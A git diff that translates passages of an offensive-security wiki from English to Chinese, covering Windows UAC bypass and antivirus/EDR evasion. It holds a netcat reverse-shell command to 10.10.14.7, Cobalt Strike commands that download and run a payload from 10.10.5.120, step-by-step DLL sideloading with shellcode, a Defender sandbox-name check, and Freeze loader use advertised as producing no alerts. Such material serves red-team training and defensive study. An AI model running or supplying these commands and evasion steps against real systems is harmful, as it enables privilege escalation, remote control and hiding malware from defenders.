+然后，为了 **绕过** **UAC**（从 **中等** 完整性级别 **提升到高**），一些攻击者使用这种二进制文件来 **执行任意代码**，因为它将从 **高完整性级别进程** 中执行。
 
-You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
+您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 检查二进制文件的 _**清单**_。您可以使用 _Process Explorer_ 或 _Process Monitor_（来自 Sysinternals）查看进程的 **完整性级别**。
 
-### Check UAC
-
-To confirm if UAC is enabled do:
+### 检查 UAC
 
+要确认 UAC 是否启用，请执行：
 ```
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
 
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
-    EnableLUA    REG_DWORD    0x1
+EnableLUA    REG_DWORD    0x1
 ```
+如果是 **`1`**，则 UAC **已激活**；如果是 **`0`** 或 **不存在**，则 UAC **未激活**。
 
-If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
-
-Then, check **which level** is configured:
-
+然后，检查 **配置了哪个级别**：
 ```
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
 
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
-    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
+ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
+- 如果 **`0`**，则 UAC 不会提示（如 **禁用**）
+- 如果 **`1`**，则管理员会被 **要求输入用户名和密码** 以高权限执行二进制文件（在安全桌面上）
+- 如果 **`2`**（**始终通知我**），UAC 将始终在管理员尝试以高权限执行某些操作时要求确认（在安全桌面上）
+- 如果 **`3`**，类似于 `1`，但不一定在安全桌面上
+- 如果 **`4`**，类似于 `2`，但不一定在安全桌面上
+- 如果 **`5`**（**默认**），它会要求管理员确认以高权限运行非 Windows 二进制文件
 
-- If **`0`** then, UAC won't prompt (like **disabled**)
-- If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
-- If **`2`** (**Always notify me**) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)
-- If **`3`** like `1` but not necessary on Secure Desktop
-- If **`4`** like `2` but not necessary on Secure Desktop
-- if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
+然后，您需要查看 **`LocalAccountTokenFilterPolicy`** 的值\
+如果值为 **`0`**，则只有 **RID 500** 用户（**内置管理员**）能够在没有 UAC 的情况下执行 **管理员任务**，如果为 `1`，则 **“Administrators”** 组中的所有帐户都可以执行这些任务。
 
-Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
-If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
+最后，查看 **`FilterAdministratorToken`** 键的值\
+如果 **`0`**（默认），则 **内置管理员帐户可以** 执行远程管理任务；如果 **`1`**，则内置管理员帐户 **无法** 执行远程管理任务，除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
 
-And, finally take a look at the value of the key **`FilterAdministratorToken`**\
-If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
+#### 总结
 
-#### Summary
+- 如果 `EnableLUA=0` 或 **不存在**，**对任何人都没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=1`，对任何人都没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=0`，对 RID 500（内置管理员）没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=1`，对所有人都有 UAC**
 
-- If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
-
-All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`
-
-You can also check the groups of your user and get the integrity level:
+所有这些信息可以通过 **metasploit** 模块收集： `post/windows/gather/win_privs`
 
+您还可以检查用户的组并获取完整性级别：
 ```
 net user %username%
 whoami /groups | findstr Level
 ```
-
-## UAC bypass
+## UAC 绕过
 
 > [!NOTE]
-> Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAC prompt appears
+> 请注意，如果您可以图形访问受害者，UAC 绕过是直接的，因为您可以在 UAC 提示出现时简单地点击“是”
 
-The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.
+在以下情况下需要 UAC 绕过：**UAC 已激活，您的进程在中等完整性上下文中运行，并且您的用户属于管理员组**。
 
-It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
+重要的是要提到，如果 UAC 处于最高安全级别（始终），则**绕过 UAC 要比在其他任何级别（默认）要困难得多**。
 
-### UAC disabled
-
-If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
+### UAC 禁用
 
+如果 UAC 已经禁用（`ConsentPromptBehaviorAdmin` 为 **`0`**），您可以使用类似的方式**以管理员权限执行反向 shell**（高完整性级别）：
 ```bash
 #Put your reverse shell instead of "calc.exe"
 Start-Process powershell -Verb runAs "calc.exe"
 Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
 ```
-
-#### UAC bypass with token duplication
+#### UAC 绕过与令牌复制
 
 - [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
 - [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
 
-### **Very** Basic UAC "bypass" (full file system access)
+### **非常** 基本的 UAC "绕过"（完全文件系统访问）
 
-If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
+如果你有一个属于管理员组的用户的 shell，你可以 **通过 SMB 挂载 C$** 共享到一个新的磁盘上，你将 **访问文件系统中的所有内容**（甚至是管理员的主文件夹）。
 
 > [!WARNING]
-> **Looks like this trick isn't working anymore**
-
+> **看起来这个技巧不再有效**
 ```bash
 net use Z: \\127.0.0.1\c$
 cd C$
@@ -133,11 +124,9 @@ cd C$
 #Or you could just access it:
 dir \\127.0.0.1\c$\Users\Administrator\Desktop
 ```
+### UAC绕过与Cobalt Strike
 
-### UAC bypass with cobalt strike
-
-The Cobalt Strike techniques will only work if UAC is not set at it's max security level
-
+Cobalt Strike技术仅在UAC未设置为最高安全级别时有效。
 ```bash
 # UAC bypass via token duplication
 elevate uac-token-duplication [listener_name]
@@ -149,20 +138,18 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
 # Bypass UAC with CMSTPLUA COM interface
 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 ```
-
-**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
+**Empire** 和 **Metasploit** 也有几个模块可以 **绕过** **UAC**。
 
 ### KRBUACBypass
 
-Documentation and tool in [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
+文档和工具在 [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
 
-### UAC bypass exploits
+### UAC 绕过漏洞
 
-[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\
-You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
-
-UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions:
+[**UACME** ](https://github.com/hfiref0x/UACME) 是几个 UAC 绕过漏洞的 **汇编**。请注意，您需要 **使用 Visual Studio 或 msbuild 编译 UACME**。编译将创建几个可执行文件（如 `Source\Akagi\outout\x64\Debug\Akagi.exe`），您需要知道 **您需要哪个**。\
+您应该 **小心**，因为某些绕过会 **提示其他程序**，这会 **警告** **用户** 有事情发生。
 
+UACME 有 **每个技术开始工作的构建版本**。您可以搜索影响您版本的技术：
 ```
 PS C:\> [environment]::OSVersion.Version
 
@@ -170,50 +157,48 @@ Major  Minor  Build  Revision
 -----  -----  -----  --------
 10     0      14393  0
 ```
+也可以使用[这个](https://en.wikipedia.org/wiki/Windows_10_version_history)页面从构建版本中获取Windows版本`1607`。
 
-Also, using [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page you get the Windows release `1607` from the build versions.
+#### 更多UAC绕过
 
-#### More UAC bypass
+**所有**用于绕过AUC的技术**都需要**与受害者的**完整交互式Shell**（普通的nc.exe Shell不够）。
 
-**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
-
-You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
+您可以使用**meterpreter**会话获取。迁移到**Session**值等于**1**的**进程**：
 
 ![](<../../images/image (863).png>)
 
-(_explorer.exe_ should works)
+（_explorer.exe_ 应该可以工作）
 
-### UAC Bypass with GUI
+### 带GUI的UAC绕过
 
-If you have access to a **GUI you can just accept the UAC prompt** when you get it, you don't really need a bypass it. So, getting access to a GUI will allow you to bypass the UAC.
+如果您可以访问**GUI，您只需在出现UAC提示时接受它**，您实际上不需要绕过它。因此，获取对GUI的访问将允许您绕过UAC。
 
-Moreover, if you get a GUI session that someone was using (potentially via RDP) there are **some tools that will be running as administrator** from where you could **run** a **cmd** for example **as admin** directly without being prompted again by UAC like [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). This might be a bit more **stealthy**.
+此外，如果您获得了某人正在使用的GUI会话（可能通过RDP），则有**一些工具将以管理员身份运行**，您可以**直接以管理员身份运行**例如**cmd**，而无需再次被UAC提示，如[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更加**隐蔽**。
 
-### Noisy brute-force UAC bypass
+### 嘈杂的暴力破解UAC绕过
 
-If you don't care about being noisy you could always **run something like** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) that **ask to elevate permissions until the user does accepts it**.
+如果您不在乎嘈杂，您可以始终**运行类似**[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)的工具，该工具**请求提升权限，直到用户接受它**。
 
-### Your own bypass - Basic UAC bypass methodology
+### 您自己的绕过 - 基本UAC绕过方法
 
-If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/).
+如果您查看**UACME**，您会注意到**大多数UAC绕过利用了Dll劫持漏洞**（主要是在_C:\Windows\System32_中写入恶意dll）。[阅读此内容以了解如何找到Dll劫持漏洞](../windows-local-privilege-escalation/dll-hijacking/)。
 
-1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
-2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
-3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
-   1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
-   2. **IFileOperation**: Windows 10.
-4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
+1. 找到一个将**自动提升**的二进制文件（检查它执行时是否以高完整性级别运行）。
+2. 使用procmon查找可能受到**DLL劫持**影响的“**NAME NOT FOUND**”事件。
+3. 您可能需要在某些**受保护路径**（如C:\Windows\System32）中**写入**DLL，而您没有写入权限。您可以使用以下方法绕过此限制：
+   1. **wusa.exe**：Windows 7、8和8.1。它允许在受保护路径中提取CAB文件的内容（因为此工具是以高完整性级别执行的）。
+   2. **IFileOperation**：Windows 10。
+4. 准备一个**脚本**，将您的DLL复制到受保护路径中，并执行易受攻击的自动提升二进制文件。
 
-### Another UAC bypass technique
+### 另一种UAC绕过技术
 
-Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
+该技术是观察一个**自动提升的二进制文件**是否尝试从**注册表**中**读取**要**执行**的**二进制文件**或**命令**的**名称/路径**（如果该二进制文件在**HKCU**中搜索此信息，则更有趣）。
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)轻松构建和**自动化工作流程**，由世界上**最先进**的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
index 9692c0fb8..c1ff5047b 100644
--- a/src/windows-hardening/av-bypass.md
+++ b/src/windows-hardening/av-bypass.md
@@ -4,380 +4,359 @@
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！**（_需要流利的波兰语书写和口语能力_）。
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-**This page was written by** [**@m2rc_p**](https://twitter.com/m2rc_p)**!**
+**本页面由** [**@m2rc_p**](https://twitter.com/m2rc_p)**撰写！**
 
-## **AV Evasion Methodology**
+## **AV规避方法论**
 
-Currently, AVs use different methods for checking if a file is malicious or not, static detection, dynamic analysis, and for the more advanced EDRs, behavioural analysis.
+目前，AV使用不同的方法来检查文件是否恶意，包括静态检测、动态分析，以及对于更高级的EDR，行为分析。
 
-### **Static detection**
+### **静态检测**
 
-Static detection is achieved by flagging known malicious strings or arrays of bytes in a binary or script, and also extracting information from the file itself (e.g. file description, company name, digital signatures, icon, checksum, etc.). This means that using known public tools may get you caught more easily, as they've probably been analyzed and flagged as malicious. There are a couple of ways of getting around this sort of detection:
+静态检测是通过标记已知的恶意字符串或字节数组在二进制文件或脚本中实现的，同时还提取文件本身的信息（例如，文件描述、公司名称、数字签名、图标、校验和等）。这意味着使用已知的公共工具可能会更容易被捕获，因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测：
 
-- **Encryption**
+- **加密**
 
-If you encrypt the binary, there will be no way for AV of detecting your program, but you will need some sort of loader to decrypt and run the program in memory.
+如果你加密了二进制文件，AV将无法检测到你的程序，但你需要某种加载程序来解密并在内存中运行该程序。
 
-- **Obfuscation**
+- **混淆**
 
-Sometimes all you need to do is change some strings in your binary or script to get it past AV, but this can be a time-consuming task depending on what you're trying to obfuscate.
+有时你只需要更改二进制文件或脚本中的一些字符串就能通过AV，但这可能是一个耗时的任务，具体取决于你想要混淆的内容。
 
-- **Custom tooling**
+- **自定义工具**
 
-If you develop your own tools, there will be no known bad signatures, but this takes a lot of time and effort.
+如果你开发自己的工具，将不会有已知的恶意签名，但这需要大量的时间和精力。
 
 > [!NOTE]
-> A good way for checking against Windows Defender static detection is [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). It basically splits the file into multiple segments and then tasks Defender to scan each one individually, this way, it can tell you exactly what are the flagged strings or bytes in your binary.
+> 检查Windows Defender静态检测的一个好方法是 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)。它基本上将文件分成多个部分，然后让Defender逐个扫描，这样可以准确告诉你在二进制文件中标记的字符串或字节。
 
-I highly recommend you check out this [YouTube playlist](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) about practical AV Evasion.
+我强烈建议你查看这个 [YouTube播放列表](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) 关于实用的AV规避。
 
-### **Dynamic analysis**
+### **动态分析**
 
-Dynamic analysis is when the AV runs your binary in a sandbox and watches for malicious activity (e.g. trying to decrypt and read your browser's passwords, performing a minidump on LSASS, etc.). This part can be a bit trickier to work with, but here are some things you can do to evade sandboxes.
+动态分析是指AV在沙箱中运行你的二进制文件并监视恶意活动（例如，试图解密并读取浏览器的密码，执行LSASS的minidump等）。这一部分可能会更难处理，但这里有一些你可以做的事情来规避沙箱。
 
-- **Sleep before execution** Depending on how it's implemented, it can be a great way of bypassing AV's dynamic analysis. AV's have a very short time to scan files to not interrupt the user's workflow, so using long sleeps can disturb the analysis of binaries. The problem is that many AV's sandboxes can just skip the sleep depending on how it's implemented.
-- **Checking machine's resources** Usually Sandboxes have very little resources to work with (e.g. < 2GB RAM), otherwise they could slow down the user's machine. You can also get very creative here, for example by checking the CPU's temperature or even the fan speeds, not everything will be implemented in the sandbox.
-- **Machine-specific checks** If you want to target a user who's workstation is joined to the "contoso.local" domain, you can do a check on the computer's domain to see if it matches the one you've specified, if it doesn't, you can make your program exit.
+- **执行前休眠** 根据实现方式，这可能是绕过AV动态分析的好方法。AV扫描文件的时间非常短，以免打断用户的工作流程，因此使用长时间的休眠可以干扰二进制文件的分析。问题是许多AV的沙箱可能会根据实现方式跳过休眠。
+- **检查机器资源** 通常沙箱可用的资源非常少（例如，< 2GB RAM），否则它们可能会减慢用户的机器。你也可以在这里发挥创造力，例如检查CPU的温度或风扇速度，并不是所有内容都会在沙箱中实现。
+- **特定机器检查** 如果你想针对加入“contoso.local”域的用户的工作站，你可以检查计算机的域以查看是否与指定的域匹配，如果不匹配，你可以让程序退出。
 
-It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you can check for the computer name in your malware before detonation, if the name matches HAL9TH, it means you're inside defender's sandbox, so you can make your program exit.
+事实证明，Microsoft Defender的沙箱计算机名是HAL9TH，因此，你可以在恶意软件引爆前检查计算机名，如果名称匹配HAL9TH，这意味着你在Defender的沙箱中，因此可以让程序退出。
 
-<figure><img src="../images/image (209).png" alt=""><figcaption><p>source: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
+<figure><img src="../images/image (209).png" alt=""><figcaption><p>来源: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
 
-Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
+一些来自 [@mgeeky](https://twitter.com/mariuszbit) 的非常好的建议，用于对抗沙箱
 
-<figure><img src="../images/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
+<figure><img src="../images/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev频道</p></figcaption></figure>
 
-As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
+正如我们在这篇文章中之前所说的，**公共工具**最终会**被检测到**，所以你应该问自己一个问题：
 
-For example, if you want to dump LSASS, **do you really need to use mimikatz**? Or could you use a different project which is lesser known and also dumps LSASS.
+例如，如果你想转储LSASS，**你真的需要使用mimikatz吗**？或者你可以使用一个不太知名的项目来转储LSASS。
 
-The right answer is probably the latter. Taking mimikatz as an example, it's probably one of, if not the most flagged piece of malware by AVs and EDRs, while the project itself is super cool, it's also a nightmare to work with it to get around AVs, so just look for alternatives for what you're trying to achieve.
+正确的答案可能是后者。以mimikatz为例，它可能是被AV和EDR标记的最多的恶意软件之一，尽管该项目本身非常酷，但在绕过AV时也很麻烦，因此只需寻找替代方案来实现你的目标。
 
 > [!NOTE]
-> When modifying your payloads for evasion, make sure to **turn off automatic sample submission** in defender, and please, seriously, **DO NOT UPLOAD TO VIRUSTOTAL** if your goal is achieving evasion in the long run. If you want to check if your payload gets detected by a particular AV, install it on a VM, try to turn off the automatic sample submission, and test it there until you're satisfied with the result.
+> 在修改你的有效载荷以进行规避时，请确保**关闭Defender中的自动样本提交**，并且请认真考虑，**如果你的目标是长期规避，请不要上传到VIRUSTOTAL**。如果你想检查你的有效载荷是否被特定AV检测到，请在虚拟机上安装它，尝试关闭自动样本提交，并在那里进行测试，直到你对结果满意为止。
 
-## EXEs vs DLLs
+## EXEs与DLLs
 
-Whenever it's possible, always **prioritize using DLLs for evasion**, in my experience, DLL files are usually **way less detected** and analyzed, so it's a very simple trick to use in order to avoid detection in some cases (if your payload has some way of running as a DLL of course).
+只要可能，始终**优先使用DLL进行规避**，根据我的经验，DLL文件通常**被检测和分析的概率要低得多**，因此在某些情况下使用它来避免检测是一个非常简单的技巧（当然，如果你的有效载荷有某种方式以DLL的形式运行）。
 
-As we can see in this image, a DLL Payload from Havoc has a detection rate of 4/26 in antiscan.me, while the EXE payload has a 7/26 detection rate.
+正如我们在这张图片中看到的，Havoc的DLL有效载荷在antiscan.me上的检测率为4/26，而EXE有效载荷的检测率为7/26。
 
-<figure><img src="../images/image (1130).png" alt=""><figcaption><p>antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL</p></figcaption></figure>
+<figure><img src="../images/image (1130).png" alt=""><figcaption><p>antiscan.me上正常Havoc EXE有效载荷与正常Havoc DLL的比较</p></figcaption></figure>
 
-Now we'll show some tricks you can use with DLL files to be much more stealthier.
+现在我们将展示一些你可以使用DLL文件的技巧，以便更加隐蔽。
 
-## DLL Sideloading & Proxying
+## DLL旁加载与代理
 
-**DLL Sideloading** takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other.
-
-You can check for programs susceptible to DLL Sideloading using [Siofra](https://github.com/Cybereason/siofra) and the following powershell script:
+**DLL旁加载**利用加载程序使用的DLL搜索顺序，通过将受害者应用程序和恶意有效载荷并排放置来实现。
 
+你可以使用 [Siofra](https://github.com/Cybereason/siofra) 和以下PowerShell脚本检查易受DLL旁加载影响的程序：
 ```powershell
 Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
-    $binarytoCheck = "C:\Program Files\" + $_
-    C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
+$binarytoCheck = "C:\Program Files\" + $_
+C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
 }
 ```
+此命令将输出在 "C:\Program Files\\" 中易受 DLL 劫持影响的程序列表及其尝试加载的 DLL 文件。
 
-This command will output the list of programs susceptible to DLL hijacking inside "C:\Program Files\\" and the DLL files they try to load.
+我强烈建议你**自己探索可被 DLL 劫持/侧载的程序**，如果正确执行，这种技术相当隐蔽，但如果你使用公开已知的 DLL 侧载程序，可能会很容易被抓住。
 
-I highly recommend you **explore DLL Hijackable/Sideloadable programs yourself**, this technique is pretty stealthy done properly, but if you use publicly known DLL Sideloadable programs, you may get caught easily.
+仅仅放置一个恶意 DLL，其名称是程序期望加载的名称，并不会加载你的有效载荷，因为程序期望该 DLL 中有一些特定的函数。为了解决这个问题，我们将使用另一种技术，称为**DLL 代理/转发**。
 
-Just by placing a malicious DLL with the name a program expects to load, won't load your payload, as the program expects some specific functions inside that DLL, to fix this issue, we'll use another technique called **DLL Proxying/Forwarding**.
+**DLL 代理**将程序从代理（和恶意）DLL 发出的调用转发到原始 DLL，从而保留程序的功能并能够处理你的有效载荷的执行。
 
-**DLL Proxying** forwards the calls a program makes from the proxy (and malicious) DLL to the original DLL, thus preserving the program's functionality and being able to handle the execution of your payload.
-
-I will be using the [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) project from [@flangvik](https://twitter.com/Flangvik/)
-
-These are the steps I followed:
+我将使用 [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) 项目，来自 [@flangvik](https://twitter.com/Flangvik/)
 
+以下是我遵循的步骤：
 ```
 1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
 2. Generate some shellcode (I used Havoc C2)
 3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
 4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
 ```
-
-The last command will give us 2 files: a DLL source code template, and the original renamed DLL.
+最后的命令将给我们两个文件：一个 DLL 源代码模板和原始重命名的 DLL。
 
 <figure><img src="../images/sharpdllproxy.gif" alt=""><figcaption></figcaption></figure>
-
 ```
 5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.
 ```
-
-These are the results:
+这些是结果：
 
 <figure><img src="../images/dll_sideloading_demo.gif" alt=""><figcaption></figcaption></figure>
 
-Both our shellcode (encoded with [SGN](https://github.com/EgeBalci/sgn)) and the proxy DLL have a 0/26 Detection rate in [antiscan.me](https://antiscan.me)! I would call that a success.
+我们的 shellcode（使用 [SGN](https://github.com/EgeBalci/sgn) 编码）和代理 DLL 在 [antiscan.me](https://antiscan.me) 上的检测率为 0/26！我认为这是一个成功。
 
 <figure><img src="../images/image (193).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> I **highly recommend** you watch [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) about DLL Sideloading and also [ippsec's video](https://www.youtube.com/watch?v=3eROsG_WNpE) to learn more about what we've discussed more in-depth.
+> 我 **强烈推荐** 你观看 [S3cur3Th1sSh1t 的 twitch VOD](https://www.twitch.tv/videos/1644171543) 关于 DLL Sideloading，以及 [ippsec 的视频](https://www.youtube.com/watch?v=3eROsG_WNpE)，以更深入地了解我们讨论的内容。
 
 ## [**Freeze**](https://github.com/optiv/Freeze)
 
-`Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods`
-
-You can use Freeze to load and execute your shellcode in a stealthy manner.
+`Freeze 是一个用于通过挂起进程、直接系统调用和替代执行方法绕过 EDR 的有效载荷工具包`
 
+你可以使用 Freeze 以隐秘的方式加载和执行你的 shellcode。
 ```
 Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
 1. Generate some shellcode, in this case I used Havoc C2.
 2. ./Freeze -I demon.bin -encrypt -O demon.exe
 3. Profit, no alerts from defender
 ```
-
 <figure><img src="../images/freeze_demo_hacktricks.gif" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> Evasion is just a cat & mouse game, what works today could be detected tomorrow, so never rely on only one tool, if possible, try chaining multiple evasion techniques.
+> 规避只是猫和老鼠的游戏，今天有效的方法明天可能会被检测到，因此永远不要仅依赖一个工具，如果可能的话，尝试将多个规避技术结合起来。
 
-## AMSI (Anti-Malware Scan Interface)
+## AMSI（反恶意软件扫描接口）
 
-AMSI was created to prevent "[fileless malware](https://en.wikipedia.org/wiki/Fileless_malware)". Initially, AVs were only capable of scanning **files on disk**, so if you could somehow execute payloads **directly in-memory**, the AV couldn't do anything to prevent it, as it didn't have enough visibility.
+AMSI的创建是为了防止“[无文件恶意软件](https://en.wikipedia.org/wiki/Fileless_malware)”。最初，AV只能扫描**磁盘上的文件**，因此如果你能够以某种方式**直接在内存中**执行有效载荷，AV就无法采取任何措施来阻止它，因为它没有足够的可见性。
 
-The AMSI feature is integrated into these components of Windows.
+AMSI功能集成在Windows的以下组件中。
 
-- User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation)
-- PowerShell (scripts, interactive use, and dynamic code evaluation)
-- Windows Script Host (wscript.exe and cscript.exe)
-- JavaScript and VBScript
-- Office VBA macros
+- 用户帐户控制，或UAC（提升EXE、COM、MSI或ActiveX安装）
+- PowerShell（脚本、交互使用和动态代码评估）
+- Windows脚本宿主（wscript.exe和cscript.exe）
+- JavaScript和VBScript
+- Office VBA宏
 
-It allows antivirus solutions to inspect script behavior by exposing script contents in a form that is both unencrypted and unobfuscated.
+它允许杀毒软件通过以未加密和未混淆的形式暴露脚本内容来检查脚本行为。
 
-Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.
+运行 `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` 将在Windows Defender上产生以下警报。
 
 <figure><img src="../images/image (1135).png" alt=""><figcaption></figcaption></figure>
 
